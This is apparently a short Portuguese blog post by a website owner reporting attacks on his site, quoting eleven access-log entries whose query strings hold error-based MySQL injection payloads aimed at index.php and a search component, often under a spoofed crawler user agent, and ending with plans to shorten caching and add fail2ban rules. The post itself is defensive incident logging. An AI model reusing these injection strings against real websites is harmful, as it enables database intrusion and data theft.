Tenho recebidos vários ataques. E hoje eu percebi que um conseguiu passar pro cache do site.
{
"time": "2026-04-27T02:26:01.602Z",
"process": "338026",
"filename": "/loureiro/index.php",
"remoteIP": "104.209.8.138",
"host": "helio.loureiro.eng.br",
"request": "/index.php",
"query": "?id=120'%20AND%20,(/*!50000SELECT*/9786/*!50000FROM*/(/*!50000SELECT*//*!50000COUNT*/(*),/*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9786=9786,1))),'~',FLOOR(RAND(0)*2))x/*!50000FROM*/INFORMATION_SCHEMA.PLUGINS/*!50000GROUP*//*!50000BY*/x)a)--%20-&start=481&task=view",
"method": "GET",
"status": "200",
"userAgent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36",
"referer": "-"
}
{
"time": "2026-04-27T03:06:29.334Z",
"process": "547775",
"filename": "/loureiro/index.php",
"remoteIP": "198.244.240.225",
"host": "helio.loureiro.eng.br",
"request": "/index.php",
"query": "?id=120\"))/*!50000AND*/EXP(~(/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9611=9611,1))),'~','x'))x))%20AND%20((\"NsNw9DLC\"=\"NsNw9DLC\"&task=view",
"method": "GET",
"status": "200",
"userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
"referer": "-"
}
{
"time": "2026-04-27T04:13:48.938Z",
"process": "1719898",
"filename": "/loureiro/index.php",
"remoteIP": "5.39.109.174",
"host": "helio.loureiro.eng.br",
"request": "/index.php",
"query": "?id=120'%20AND%20,(/*!50000SELECT*/9786/*!50000FROM*/(/*!50000SELECT*//*!50000COUNT*/(*),/*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9786=9786,1))),'~',FLOOR(RAND(0)*2))x/*!50000FROM*/INFORMATION_SCHEMA.PLUGINS/*!50000GROUP*//*!50000BY*/x)a)--%20-&task=view&start=26",
"method": "GET",
"status": "200",
"userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
"referer": "-"
}
{
"time": "2026-04-27T04:38:04.280Z",
"process": "1364863",
"filename": "/loureiro/index.php",
"remoteIP": "170.79.185.158",
"host": "helio.loureiro.eng.br",
"request": "/index.php",
"query": "?id=120%22%29%29%2F%2A%2150000AND%2A%2FEXP%28~%28%2F%2A%2150000SELECT%2A%2F%2A%2F%2A%2150000FROM%2A%2F%28%2F%2A%2150000SELECT%2A%2F%2F%2A%2150000CONCAT%2A%2F%28%27~%27%2C%28%2F%2A%2150000SELECT%2A%2F%28ELT%289611%3D9611%2C1%29%29%29%2C%27~%27%2C%27x%27%29%29x%29%29+AND+%28%28%22NsNw9DLC%22%3D%22NsNw9DLC%22&start=169&task=view",
"method": "GET",
"status": "200",
"userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36",
"referer": "https://helio.loureiro.eng.br/index.php?id=120%22%29%29%2F%2A%2150000AND%2A%2FEXP%28~%28%2F%2A%2150000SELECT%2A%2F%2A%2F%2A%2150000FROM%2A%2F%28%2F%2A%2150000SELECT%2A%2F%2F%2A%2150000CONCAT%2A%2F%28%27~%27%2C%28%2F%2A%2150000SELECT%2A%2F%28ELT%289611%3D9611%2C1%29%29%29%2C%27~%27%2C%27x%27%29%29x%29%29+AND+%28%28%22NsNw9DLC%22%3D%22NsNw9DLC%22&start=143&task=view"
}
{
"time": "2026-04-27T04:38:20.526Z",
"process": "33454",
"filename": "/loureiro/index.php",
"remoteIP": "217.199.226.8",
"host": "helio.loureiro.eng.br",
"request": "/index.php",
"query": "?id=120%22%29%29%2F%2A%2150000AND%2A%2FEXP%28~%28%2F%2A%2150000SELECT%2A%2F%2A%2F%2A%2150000FROM%2A%2F%28%2F%2A%2150000SELECT%2A%2F%2F%2A%2150000CONCAT%2A%2F%28%27~%27%2C%28%2F%2A%2150000SELECT%2A%2F%28ELT%289611%3D9611%2C1%29%29%29%2C%27~%27%2C%27x%27%29%29x%29%29+AND+%28%28%22NsNw9DLC%22%3D%22NsNw9DLC%22&start=169&task=view",
"method": "GET",
"status": "200",
"userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",
"referer": "https://helio.loureiro.eng.br/index.php?id=120%22%29%29%2F%2A%2150000AND%2A%2FEXP%28~%28%2F%2A%2150000SELECT%2A%2F%2A%2F%2A%2150000FROM%2A%2F%28%2F%2A%2150000SELECT%2A%2F%2F%2A%2150000CONCAT%2A%2F%28%27~%27%2C%28%2F%2A%2150000SELECT%2A%2F%28ELT%289611%3D9611%2C1%29%29%29%2C%27~%27%2C%27x%27%29%29x%29%29+AND+%28%28%22NsNw9DLC%22%3D%22NsNw9DLC%22&start=143&task=view"
}
{
"time": "2026-04-27T05:08:21.162Z",
"process": "459943",
"filename": "/loureiro/index.php",
"remoteIP": "51.195.183.127",
"host": "helio.loureiro.eng.br",
"request": "/index.php",
"query": "?id=120\"))/*!50000AND*/EXP(~(/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9611=9611,1))),'~','x'))x))%20AND%20((\"NsNw9DLC\"=\"NsNw9DLC\"&task=view&start=52",
"method": "GET",
"status": "200",
"userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
"referer": "-"
}
{
"time": "2026-04-27T05:12:55.699Z",
"process": "243586",
"filename": "/loureiro/index.php",
"remoteIP": "51.89.129.94",
"host": "helio.loureiro.eng.br",
"request": "/index.php",
"query": "?id=120\"))/*!50000AND*/EXP(~(/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9611=9611,1))),'~','x'))x))%20AND%20((\"NsNw9DLC\"=\"NsNw9DLC\"&task=view&start=377",
"method": "GET",
"status": "200",
"userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
"referer": "-"
}
{
"time": "2026-04-27T05:25:00.517Z",
"process": "406363",
"filename": "/loureiro/index.php",
"remoteIP": "198.244.226.168",
"host": "helio.loureiro.eng.br",
"request": "/index.php",
"query": "?id=120\"))/*!50000AND*/EXP(~(/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9611=9611,1))),'~','x'))x))%20AND%20((\"NsNw9DLC\"=\"NsNw9DLC\"&task=view&start=364",
"method": "GET",
"status": "200",
"userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
"referer": "-"
}
{
"time": "2026-04-27T07:18:24.576Z",
"process": "287085",
"filename": "/loureiro/index.php",
"remoteIP": "198.244.183.180",
"host": "helio.loureiro.eng.br",
"request": "/index.php",
"query": "?id=120'%20AND%20,(/*!50000SELECT*/9786/*!50000FROM*/(/*!50000SELECT*//*!50000COUNT*/(*),/*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(9786=9786,1))),'~',FLOOR(RAND(0)*2))x/*!50000FROM*/INFORMATION_SCHEMA.PLUGINS/*!50000GROUP*//*!50000BY*/x)a)--%20-&task=view&start=117",
"method": "GET",
"status": "200",
"userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
"referer": "-"
}
{
"time": "2026-04-27T07:40:43.198Z",
"process": "155356",
"filename": "/loureiro/index.php",
"remoteIP": "54.38.147.143",
"host": "helio.loureiro.eng.br",
"request": "/index.php/component/finder/search",
"query": "?q=1/*!50000AND*/(/*!50000SELECT*/2*(IF((/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(4119=4119,1))),'~','x'))s),/**/8446744073709551610,/**/8446744073709551610)))%20PROCEDURE%20ANALYSE(6670,1)--%20-&Itemid=101",
"method": "GET",
"status": "200",
"userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
"referer": "-"
}
{
"time": "2026-04-27T07:58:26.393Z",
"process": "530181",
"filename": "/loureiro/index.php",
"remoteIP": "54.38.147.108",
"host": "helio.loureiro.eng.br",
"request": "/index.php",
"query": "?id=120'))/*!50000AND*/(/*!50000SELECT*/2*(IF((/*!50000SELECT*/*/*!50000FROM*/(/*!50000SELECT*//*!50000CONCAT*/('~',(/*!50000SELECT*/(ELT(7089=7089,1))),'~','x'))s),/**/8446744073709551610,/**/8446744073709551610)))%20AND%20(('q3G8xIn9'%20LIKE%20'q3G8xIn9&task=view",
"method": "GET",
"status": "200",
"userAgent": "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
"referer": "-"
}
Diminui o tempo de cache pra ver se isso segura a onda. Mas provavelmente vou precisar configurar meu fail2ban pra esses regex.
